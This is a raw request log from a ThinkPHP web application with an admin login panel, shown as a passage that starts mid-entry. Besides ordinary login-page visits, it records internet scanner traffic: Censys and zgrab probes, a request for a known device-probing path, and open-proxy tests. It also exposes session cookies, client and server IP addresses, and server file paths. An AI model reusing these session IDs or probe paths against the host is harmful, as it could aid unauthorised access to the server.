=> 'site', 2 => 'config', 3 => 'auth', 4 => 'admin', 5 => 'background', 6 => 'title', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000146s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T17:37:04+08:00 ] 125.122.15.53 GET / [ info ] clcoa.com:8081/ [运行时间:0.027663s][吞吐率:36.15req/s] [内存消耗:3,286.52kb] [文件加载:67] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001174s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com:8081', 'user-agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'accept-language' => 'en;q=0.9', 'cache-control' => 'max-age=0', 'dnt' => '1', 'sec-gpc' => '1', 'upgrade-insecure-requests' => '1', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001597s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000118s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T17:37:04+08:00 ] 125.122.15.53 GET / [ info ] clcoa.com:8081/ [运行时间:0.029005s][吞吐率:34.48req/s] [内存消耗:3,285.08kb] [文件加载:67] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001223s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com:8081', 'user-agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7', 'accept-language' => 'en', 'upgrade-insecure-requests' => '1', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001658s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000100s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T17:37:07+08:00 ] 125.122.15.53 GET /admin/index/login?url=%2F [ info ] clcoa.com:8081/admin/index/login?url=%2F [运行时间:0.032093s][吞吐率:31.16req/s] [内存消耗:3,782.51kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001130s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'index', 2 => 'login', ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com:8081', 'user-agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7', 'accept-language' => 'en', 'cookie' => 'PHPSESSID=ovoknjo8jma8jsrpobignime61', 'referer' => 'http://clcoa.com:8081/', 'upgrade-insecure-requests' => '1', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( 'url' => '/', ) [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001518s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ RUN ] app\admin\controller\Index->login[ /alidata/www/gendan/application/admin/controller/Index.php ] [ info ] [ VIEW ] /alidata/www/gendan/public/../application/admin/view/index/login.html [ array ( 0 => 'breadcrumb', 1 => 'site', 2 => 'config', 3 => 'auth', 4 => 'admin', 5 => 'background', 6 => 'title', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000101s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T17:37:08+08:00 ] 125.122.15.53 GET /admin/ajax/lang?callback=define&controllername=index&v=1765705027 [ info ] clcoa.com:8081/admin/ajax/lang?callback=define&controllername=index&v=1765705027 [运行时间:0.034887s][吞吐率:28.66req/s] [内存消耗:3,796.26kb] [文件加载:68] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000046s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001138s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ajax', 2 => 'lang', ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com:8081', 'user-agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36', 'accept' => '*/*', 'accept-language' => 'en', 'cookie' => 'PHPSESSID=ovoknjo8jma8jsrpobignime61', 'referer' => 'http://clcoa.com:8081/admin/index/login?url=%2F', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( 'callback' => 'define', 'controllername' => 'index', 'v' => '1765705027', ) [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001535s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ RUN ] app\admin\controller\Ajax->lang[ /alidata/www/gendan/application/admin/controller/Ajax.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000152s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T17:37:13+08:00 ] 123.160.221.130 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.026138s][吞吐率:38.26req/s] [内存消耗:3,286.38kb] [文件加载:67] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001096s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'user-agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'accept-language' => 'en;q=0.9', 'cache-control' => 'max-age=0', 'dnt' => '1', 'sec-gpc' => '1', 'upgrade-insecure-requests' => '1', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001464s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000106s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T17:37:13+08:00 ] 123.160.221.130 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.027895s][吞吐率:35.85req/s] [内存消耗:3,285.34kb] [文件加载:67] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000036s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001262s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'user-agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7', 'accept-language' => 'en', 'upgrade-insecure-requests' => '1', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001527s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000096s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T17:37:17+08:00 ] 123.160.221.130 GET /admin/index/login?url=%2F [ info ] 47.105.33.115:8081/admin/index/login?url=%2F [运行时间:0.030565s][吞吐率:32.72req/s] [内存消耗:3,782.39kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001106s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'index', 2 => 'login', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'user-agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7', 'accept-language' => 'en', 'cookie' => 'PHPSESSID=msr4d1dfsaf1njil3ik4ga5jf2', 'referer' => 'http://47.105.33.115:8081/', 'upgrade-insecure-requests' => '1', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( 'url' => '/', ) [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001513s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ RUN ] app\admin\controller\Index->login[ /alidata/www/gendan/application/admin/controller/Index.php ] [ info ] [ VIEW ] /alidata/www/gendan/public/../application/admin/view/index/login.html [ array ( 0 => 'breadcrumb', 1 => 'site', 2 => 'config', 3 => 'auth', 4 => 'admin', 5 => 'background', 6 => 'title', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000097s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T17:37:17+08:00 ] 123.160.221.130 GET /admin/ajax/lang?callback=define&controllername=index&v=1765705037 [ info ] 47.105.33.115:8081/admin/ajax/lang?callback=define&controllername=index&v=1765705037 [运行时间:0.028817s][吞吐率:34.70req/s] [内存消耗:3,796.33kb] [文件加载:68] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001071s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ajax', 2 => 'lang', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'user-agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36', 'accept' => '*/*', 'accept-language' => 'en', 'cookie' => 'PHPSESSID=msr4d1dfsaf1njil3ik4ga5jf2', 'referer' => 'http://47.105.33.115:8081/admin/index/login?url=%2F', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( 'callback' => 'define', 'controllername' => 'index', 'v' => '1765705037', ) [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001499s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ RUN ] app\admin\controller\Ajax->lang[ /alidata/www/gendan/application/admin/controller/Ajax.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000092s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T17:41:14+08:00 ] 3.131.215.38 GET / [ info ] 47.105.33.115/ [运行时间:0.028050s][吞吐率:35.65req/s] [内存消耗:3,332.96kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001307s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36', 'accept' => '*/*', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001541s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000096s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T17:43:25+08:00 ] 3.131.215.38 GET / [ info ] 47.105.33.115/ [运行时间:0.027065s][吞吐率:36.95req/s] [内存消耗:3,332.96kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000036s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001153s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36', 'accept' => '*/*', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001469s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000096s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T17:48:38+08:00 ] 167.94.138.38 GET / [ info ] 47.105.33.115/ [运行时间:0.030590s][吞吐率:32.69req/s] [内存消耗:3,333.05kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000054s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001164s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'accept' => '*/*', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001526s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000100s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T17:51:02+08:00 ] 206.168.34.47 GET /favicon.ico [ info ] 47.105.33.115:8081/favicon.ico [运行时间:0.019974s][吞吐率:50.07req/s] [内存消耗:2,225.74kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001144s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'favicon.ico', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'user-agent' => 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'accept-encoding' => 'gzip', 'connection' => 'close', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T17:51:04+08:00 ] 167.94.138.38 GET /login [ info ] 47.105.33.115/login [运行时间:0.018880s][吞吐率:52.97req/s] [内存消耗:2,228.38kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000036s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001097s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'login', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'accept' => '*/*', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T17:57:12+08:00 ] 91.224.92.55 OPTIONS / [ info ] 47.105.33.115:80/ [运行时间:0.028651s][吞吐率:34.90req/s] [内存消耗:3,333.91kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000051s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001168s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36', 'accept-encoding' => 'gzip, deflate', 'accept' => '*/*', 'connection' => 'keep-alive', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'host' => '47.105.33.115:80', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001556s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000109s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T17:57:18+08:00 ] 89.42.231.244 GET /SDK/webLanguage [ info ] 47.105.33.115:80/SDK/webLanguage [运行时间:0.018730s][吞吐率:53.39req/s] [内存消耗:2,207.57kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001092s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'SDK', 1 => 'webLanguage', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46', 'accept-encoding' => 'gzip, deflate, gzip, deflate', 'accept' => '*/*', 'connection' => 'keep-alive', 'x-requested-with' => 'XMLHttpRequest', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'accept-language' => 'en US,en;q=0.9,sv;q=0.8', 'host' => '47.105.33.115:80', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T17:58:54+08:00 ] 165.232.142.253 GET /squid-internal-mgr/cachemgr.cgi [ info ] 47.105.33.115/squid-internal-mgr/cachemgr.cgi [运行时间:0.019625s][吞吐率:50.96req/s] [内存消耗:2,225.52kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001141s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'squid-internal-mgr', 1 => 'cachemgr.cgi', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 zgrab/0.x', 'accept' => '*/*', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:05:18+08:00 ] 64.62.197.77 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.028841s][吞吐率:34.67req/s] [内存消耗:3,333.33kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001157s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'user-agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15', 'accept' => '*/*', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001569s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000107s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:05:36+08:00 ] 64.62.197.82 GET /favicon.ico [ info ] 47.105.33.115:8081/favicon.ico [运行时间:0.021422s][吞吐率:46.68req/s] [内存消耗:2,225.93kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001186s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'favicon.ico', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'user-agent' => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36', 'accept' => '*/*', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:05:43+08:00 ] 64.62.197.82 GET http://api.ipify.org/?format=json [ info ] api.ipify.orghttp://api.ipify.org/?format=json [运行时间:0.027728s][吞吐率:36.06req/s] [内存消耗:3,333.00kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001110s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'api.ipify.org', 'user-agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15', ) [ info ] [ PARAM ] array ( 'format' => 'json', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001467s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000098s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:05:49+08:00 ] 64.62.197.79 CONNECT www.shadowserver.org:443 [ info ] www.shadowserver.orgwww.shadowserver.org:443 [运行时间:0.028356s][吞吐率:35.27req/s] [内存消耗:3,331.85kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001148s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'www.shadowserver.org', 'user-agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15', 'connection' => 'Keep-Alive', 'pragma' => 'no-cache', 'proxy-connection' => 'Keep-Alive', ) 